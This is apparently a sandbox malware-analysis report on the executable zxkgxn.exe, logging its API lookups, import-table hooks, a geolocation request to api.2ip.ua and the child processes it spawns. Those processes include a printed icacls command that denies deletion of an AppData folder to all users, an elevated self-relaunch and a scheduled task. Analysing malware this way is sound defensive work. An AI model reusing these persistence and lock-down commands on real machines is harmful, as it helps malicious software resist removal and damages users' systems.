Get Time	type = System Time, time = 2019-06-30 09:01:15 (UTC)	1	Fn
Get Time	type = Performance Ctr, time = 14927331472	1	Fn
Get Time	type = System Time, time = 2019-06-30 09:01:17 (UTC)	1	Fn
Get Time	type = Performance Ctr, time = 15674848342	1	Fn
Get Time	type = System Time, time = 2019-06-30 09:01:23 (UTC)	1	Fn
Get Info	type = Hardware Information	249	Fn
Get Info	type = Operating System	1	Fn
Get Info	type = Operating System	1	Fn

Environment (2)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	-		2	Fn Data

Network Behavior

HTTP Sessions (1)

Information	Value
Total Data Sent	467 bytes
Total Data Received	7.12 KB
Contacted Host Count	1
Contacted Hosts	77.123.139.189

HTTP Session #1

Information	Value
Server Name	api.2ip.ua
Server Port	443
Username	-
Password	-
Data Sent	467 bytes
Data Received	7.12 KB

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = https, server_name = api.2ip.ua, server_port = 443	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json	1	Fn
Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json	1	Fn
Read Response	size = 10240, size_out = 465	1	Fn Data
Close Session	-	1	Fn

Process #3: icacls.exe

Information	Value
ID	#3
File Name	c:\windows\syswow64\icacls.exe
Command Line	icacls "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\23aa8f91-8e4c-4e01-8a6f-bd3657c0ac36" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Initial Working Directory	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor	Start Time: 00:00:44, Reason: Child Process
Unmonitor	End Time: 00:00:46, Reason: Self Terminated
Monitor Duration	00:00:01
Remark	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0xb00
Parent PID	0xa14 (c:\users\5p5nrgjn0js halpmcxz\desktop\zxkgxn.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x B04 0x B08

Process #4: taskeng.exe

Information	Value
ID	#4
File Name	c:\windows\system32\taskeng.exe
Command Line	taskeng.exe {0E3013FB-5D32-4499-A940-035C87CD1A3B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:45, Reason: Created Scheduled Job
Unmonitor	End Time: 00:01:08, Reason: Self Terminated
Monitor Duration	00:00:22
Remark	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0x50c
Parent PID	0x36c (Unknown)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x AE8 0x 934 0x 578 0x 574 0x 520 0x 514 0x 510

Process #5: zxkgxn.exe

570

Information	Value
ID	#5
File Name	c:\users\5p5nrgjn0js halpmcxz\desktop\zxkgxn.exe
Command Line	"C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\zxkgxn.exe" --Admin IsNotAutoStart IsNotTask
Initial Working Directory	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor	Start Time: 00:00:45, Reason: Child Process
Unmonitor	End Time: 00:01:07, Reason: Self Terminated
Monitor Duration	00:00:22

OS Process Information

Information	Value
PID	0xb10
Parent PID	0xa14 (c:\users\5p5nrgjn0js halpmcxz\desktop\zxkgxn.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x B14 0x B20 0x B24 0x B28 0x B2C 0x B30 0x B34

Hook Information

Type	Installer	Target	Size	Information	Actions
IAT	private_0x0000000000600000:+0x5a5df	1. entry of zxkgxn.exe	4 bytes	ntdll.dll:RtlReAllocateHeap+0x0 now points to private_0x000000007fff0000:+0x6a00fffb	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	5. entry of zxkgxn.exe	4 bytes	kernel32.dll:WaitForSingleObject+0x0 now points to private_0x000000007fff0000:+0x4784078b	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	6. entry of zxkgxn.exe	4 bytes	kernel32.dll:SetTapeParameters+0x0 now points to private_0x000000007fff0000:+0x68868904	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	7. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetModuleHandleW+0x0 now points to private_0x000000007fff0000:+0x600fffb	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	8. entry of zxkgxn.exe	4 bytes	kernel32.dll:ExpandEnvironmentStringsA+0x0 now points to private_0x000000007fff0000:+0x78868bc0	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	9. entry of zxkgxn.exe	4 bytes	kernel32.dll:WaitNamedPipeW+0x0 now points to private_0x000000007fff0000:+0xa00fffb	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	10. entry of zxkgxn.exe	4 bytes	kernel32.dll:EnumTimeFormatsA+0x0 now points to private_0x000000007fff0000:+0x7ffcf0bd	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	11. entry of zxkgxn.exe	4 bytes	kernel32.dll:LoadLibraryW+0x0 now points to private_0x000000007fff0000:+0x7c8a0fff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	12. entry of zxkgxn.exe	4 bytes	kernel32.dll:Sleep+0x0 now points to private_0x000000007fff0000:+0x3010008	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	13. entry of zxkgxn.exe	4 bytes	kernel32.dll:FormatMessageW+0x0 now points to private_0x000000007fff0000:+0x7ffce88d	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	14. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetStringTypeExW+0x0 now points to private_0x000000007fff0000:+0x70eaffff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	16. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetSystemDirectoryA+0x0 now points to private_0x000000007fff0000:+0x7ffce88d	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	17. entry of zxkgxn.exe	4 bytes	kernel32.dll:CreateMailslotW+0x0 now points to private_0x000000007fff0000:+0x37100aff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	18. entry of zxkgxn.exe	4 bytes	kernel32.dll:WritePrivateProfileStringW+0x0 now points to private_0x000000007fff0000:+0x50c283c2	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	19. entry of zxkgxn.exe	4 bytes	kernel32.dll:ReplaceFileA+0x0 now points to private_0x000000007fff0000:+0x58ac103	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	20. entry of zxkgxn.exe	4 bytes	kernel32.dll:EnumSystemLocalesA+0x0 now points to private_0x000000007fff0000:+0x8000fbe8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	21. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetProfileIntA+0x0 now points to private_0x0000000000050000:+0x3cae9	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	22. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetLastError+0x0 now points to private_0x000000007fff0000:+0x42b80f00	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	28. entry of zxkgxn.exe	4 bytes	kernel32.dll:FindFirstVolumeMountPointW+0x0 now points to private_0x000000007fff0000:+0x7bf9858b	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	29. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetProfileStringA+0x0 now points to private_0x000000007fff0000:+0x510ffff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	32. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetDefaultCommConfigA+0x0 now points to private_0x000000007fff0000:+0x7cea0000	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	33. entry of zxkgxn.exe	4 bytes	kernel32.dll:VirtualProtect+0x0 now points to private_0x000000007fff0000:+0xc00fffe	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	34. entry of zxkgxn.exe	4 bytes	ntdll.dll:RtlDeleteCriticalSection+0x0 now points to private_0x000000007fff0000:+0x7ffcf885	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	36. entry of zxkgxn.exe	4 bytes	kernel32.dll:MoveFileWithProgressW+0x0 now points to private_0x000000007fff0000:+0x40841475	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	37. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetConsoleProcessList+0x0 now points to pagefile_0x0000000000a20000:+0x298102	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	38. entry of zxkgxn.exe	4 bytes	kernel32.dll:WriteConsoleW+0x0 now points to private_0x000000007fff0000:+0x9010010	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	39. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetStringTypeW+0x0 now points to private_0x000000007fff0000:+0x7ffcf885	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	40. entry of zxkgxn.exe	4 bytes	kernel32.dll:ReadConsoleW+0x0 now points to private_0x000000007fff0000:+0x7edee9ff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	41. entry of zxkgxn.exe	4 bytes	kernel32.dll:ReadFile+0x0 now points to private_0x000000007fff0000:+0x4b84ffff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	42. entry of zxkgxn.exe	4 bytes	kernel32.dll:OutputDebugStringW+0x0 now points to private_0x000000007fff0000:+0x7ed6e910	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	44. entry of zxkgxn.exe	4 bytes	kernel32.dll:SetStdHandle+0x0 now points to private_0x000000007fff0000:+0x69d90b58	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	45. entry of zxkgxn.exe	4 bytes	kernel32.dll:EnumSystemLocalesW+0x0 now points to private_0x000000007fff0000:+0x8000fed9	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	46. entry of zxkgxn.exe	4 bytes	kernel32.dll:HeapFree+0x0 now points to private_0x000000007fff0000:+0x7bf9858b	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	47. entry of zxkgxn.exe	4 bytes	ntdll.dll:RtlEncodePointer+0x0 now points to private_0x000000007fff0000:+0x3710ffff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	49. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetCommandLineA+0x0 now points to private_0x000000007fff0000:+0x3d8c2375	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	50. entry of zxkgxn.exe	4 bytes	kernel32.dll:RaiseException+0x0 now points to private_0x000000007fff0000:+0x8000fbf8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	52. entry of zxkgxn.exe	4 bytes	kernel32.dll:IsDebuggerPresent+0x0 now points to private_0x000000007fff0000:+0xb177534	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	54. entry of zxkgxn.exe	4 bytes	ntdll.dll:RtlEnterCriticalSection+0x0 now points to private_0x000000007fff0000:+0x1cb81	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	55. entry of zxkgxn.exe	4 bytes	ntdll.dll:RtlLeaveCriticalSection+0x0 now points to private_0x000000007fff0000:+0x58a0000	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	56. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetStdHandle+0x0 now points to private_0x000000007fff0000:+0x8000fbf8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	57. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetFileType+0x0 now points to private_0x000000007fff0000:+0x7fff9ae9	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	59. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetProcessHeap+0x0 now points to private_0x000000007fff0000:+0x3d8c2375	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	60. entry of zxkgxn.exe	4 bytes	ntdll.dll:RtlAllocateHeap+0x0 now points to private_0x000000007fff0000:+0x8000fbf8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	62. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetModuleHandleExW+0x0 now points to private_0x000000007fff0000:+0xb177532	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	64. entry of zxkgxn.exe	4 bytes	kernel32.dll:AreFileApisANSI+0x0 now points to private_0x000000007fff0000:+0xe381	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	65. entry of zxkgxn.exe	4 bytes	kernel32.dll:MultiByteToWideChar+0x0 now points to private_0x000000007fff0000:+0x58affff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	66. entry of zxkgxn.exe	4 bytes	kernel32.dll:WideCharToMultiByte+0x0 now points to private_0x000000007fff0000:+0x8000fbf8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	67. entry of zxkgxn.exe	4 bytes	ntdll.dll:RtlSizeHeap+0x0 now points to private_0x000000007fff0000:+0x7fff72e9	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	68. entry of zxkgxn.exe	4 bytes	kernel32.dll:CloseHandle+0x0 now points to private_0x000000007fff0000:+0x53c66ff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	69. entry of zxkgxn.exe	4 bytes	kernel32.dll:SetLastError+0x0 now points to private_0x000000007fff0000:+0x8000fb8c	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	72. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetModuleFileNameA+0x0 now points to private_0x000000007fff0000:+0x7ffc8885	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	73. entry of zxkgxn.exe	4 bytes	kernel32.dll:WriteFile+0x0 now points to private_0x000000007fff0000:+0x7e850fff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	75. entry of zxkgxn.exe	4 bytes	kernel32.dll:QueryPerformanceCounter+0x0 now points to private_0x000000007fff0000:+0x7b99853b	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	76. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetCurrentProcessId+0x0 now points to private_0x000000007fff0000:+0x410ffff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	79. entry of zxkgxn.exe	4 bytes	kernel32.dll:FreeEnvironmentStringsW+0x0 now points to private_0x0000000000050000:+0x2e884	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	83. entry of zxkgxn.exe	4 bytes	kernel32.dll:CreateEventW+0x0 now points to private_0x000000007fff0000:+0x7ffc9085	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	84. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetCurrentProcess+0x0 now points to private_0x000000007fff0000:+0x52850fff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	86. entry of zxkgxn.exe	4 bytes	kernel32.dll:TlsAlloc+0x0 now points to private_0x000000007fff0000:+0x4c8689c0	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	87. entry of zxkgxn.exe	4 bytes	kernel32.dll:TlsGetValue+0x0 now points to private_0x000000007fff0000:+0xe00fffb	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	88. entry of zxkgxn.exe	4 bytes	kernel32.dll:TlsSetValue+0x0 now points to private_0x000000007fff0000:+0x7ffce085	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	89. entry of zxkgxn.exe	4 bytes	kernel32.dll:TlsFree+0x0 now points to private_0x000000007fff0000:+0x5486c7ff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	92. entry of zxkgxn.exe	4 bytes	kernel32.dll:FatalAppExitA+0x0 now points to private_0x000000007fff0000:+0x7bd9b5ff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	93. entry of zxkgxn.exe	4 bytes	kernel32.dll:IsValidCodePage+0x0 now points to private_0x000000007fff0000:+0x6853ffff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	95. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetOEMCP+0x0 now points to private_0x000000007fff0000:+0x690dc483	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	97. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetConsoleCP+0x0 now points to private_0x000000007fff0000:+0x3c3b70f	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	98. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetConsoleMode+0x0 now points to private_0x000000007fff0000:+0xf1064f8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000600000:+0x5a5df	101. entry of zxkgxn.exe	4 bytes	kernel32.dll:FreeLibrary+0x0 now points to private_0x000000007fff0000:+0x78840000	... Actions Go to Installer Region Go to Target Region

Host Behavior

File (6)

Operation	Filename	Additional Information	Count	Logfile
Open	STD_INPUT_HANDLE	-	2	Fn
Open	STD_OUTPUT_HANDLE	-	2	Fn
Open	STD_ERROR_HANDLE	-	2	Fn

Module (306)

Operation	Module	Additional Information	Count	Logfile
Load	kernel32.dll	base_address = 0x76c20000	2	Fn
Load	RPCRT4.dll	base_address = 0x75ee0000	1	Fn
Load	MPR.dll	base_address = 0x74b30000	1	Fn
Load	WININET.dll	base_address = 0x753d0000	1	Fn
Load	WINMM.dll	base_address = 0x74af0000	1	Fn
Load	SHLWAPI.dll	base_address = 0x75340000	1	Fn
Load	KERNEL32.dll	base_address = 0x76c20000	1	Fn
Load	USER32.dll	base_address = 0x74f40000	1	Fn
Load	ADVAPI32.dll	base_address = 0x74d40000	1	Fn
Load	SHELL32.dll	base_address = 0x75fd0000	1	Fn
Load	ole32.dll	base_address = 0x755e0000	1	Fn
Load	OLEAUT32.dll	base_address = 0x75220000	1	Fn
Load	IPHLPAPI.DLL	base_address = 0x74b50000	1	Fn
Load	WS2_32.dll	base_address = 0x75bc0000	1	Fn
Load	DNSAPI.dll	base_address = 0x74a80000	1	Fn
Load	CRYPT32.dll	base_address = 0x759b0000	1	Fn
Load	msvcr100.dll	base_address = 0x749c0000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x76c20000	2	Fn
Get Filename	-	process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\zxkgxn.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\zxkgxn.exe, size = 260	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsAlloc, address_out = 0x76c34f2b	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsFree, address_out = 0x76c3359f	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsGetValue, address_out = 0x76c31252	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsSetValue, address_out = 0x76c34208	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionEx, address_out = 0x76c34d28	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventExW, address_out = 0x76cb410b	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreExW, address_out = 0x76cb4195	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadStackGuarantee, address_out = 0x76c3d31f	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolTimer, address_out = 0x76c4ee7e	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolTimer, address_out = 0x7717441c	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForThreadpoolTimerCallbacks, address_out = 0x7719c50e	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolTimer, address_out = 0x7719c381	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolWait, address_out = 0x76c4f088	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolWait, address_out = 0x771805d7	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolWait, address_out = 0x7719ca24	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushProcessWriteBuffers, address_out = 0x77150b8c	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibraryWhenCallbackReturns, address_out = 0x7720fde8	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessorNumber, address_out = 0x771a1e1d	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalProcessorInformation, address_out = 0x76cb4761	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSymbolicLinkW, address_out = 0x76cacd11	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetDefaultDllDirectories, address_out = 0x0	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumSystemLocalesEx, address_out = 0x76cb424f	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringEx, address_out = 0x76cb46b1	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDateFormatEx, address_out = 0x76cc6676	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoEx, address_out = 0x76cb4751	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeFormatEx, address_out = 0x76cc65f1	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultLocaleName, address_out = 0x76cb47c1	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidLocaleName, address_out = 0x76cb47e1	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringEx, address_out = 0x76cb47f1	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentPackageId, address_out = 0x0	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount64, address_out = 0x76c4eee0	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileInformationByHandleExW, address_out = 0x0	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileInformationByHandleW, address_out = 0x0	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryA, address_out = 0x76c349d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x76c31856	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualProtect, address_out = 0x76c3435f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFree, address_out = 0x76c3186e	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersionExA, address_out = 0x76c33519	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateProcess, address_out = 0x76c4d802	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x76c37a10	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetErrorMode, address_out = 0x76c31b00	2	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = RpcStringFreeW, address_out = 0x75f01635	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidToStringW, address_out = 0x75f21ee5	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidToStringA, address_out = 0x75f5d918	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = RpcStringFreeA, address_out = 0x75f23fc5	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidCreate, address_out = 0x75eff48b	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetCloseEnum, address_out = 0x74b32dd6	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetOpenEnumW, address_out = 0x74b32f06	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetEnumResourceW, address_out = 0x74b33058	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCloseHandle, address_out = 0x753eab49	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenUrlW, address_out = 0x7544be5c	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetReadFile, address_out = 0x753eb406	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenUrlA, address_out = 0x754130f1	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpQueryInfoW, address_out = 0x753f5c75	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenA, address_out = 0x753ff18e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenW, address_out = 0x753f9197	1	Fn
Get Address	c:\windows\syswow64\winmm.dll	function = timeGetTime, address_out = 0x74af26e0	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindExtensionW, address_out = 0x7535a1b9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindFileNameW, address_out = 0x7535bb71	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveFileSpecW, address_out = 0x75353248	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsW, address_out = 0x753545bf	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAppendW, address_out = 0x753581ef	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAppendA, address_out = 0x7534d65e	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsA, address_out = 0x7537ad1a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount, address_out = 0x76c3110c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsFree, address_out = 0x76c33587	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCommandLineW, address_out = 0x76c35223	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileA, address_out = 0x76c353c6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileW, address_out = 0x76c34435	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointer, address_out = 0x76c317d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenA, address_out = 0x76c35a4b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibrary, address_out = 0x76c334c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessW, address_out = 0x76c3103d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointerEx, address_out = 0x76c4c807	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryW, address_out = 0x76c34259	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForSingleObject, address_out = 0x76c31136	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalDrives, address_out = 0x76c35371	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x76c31282	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDriveTypeA, address_out = 0x76c4ef75	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenProcess, address_out = 0x76c31986	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalAlloc, address_out = 0x76c3588e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemDirectoryW, address_out = 0x76c35063	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x76c3170d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryW, address_out = 0x76c3492b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x76c310ff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileW, address_out = 0x76c5830d	1	Fn
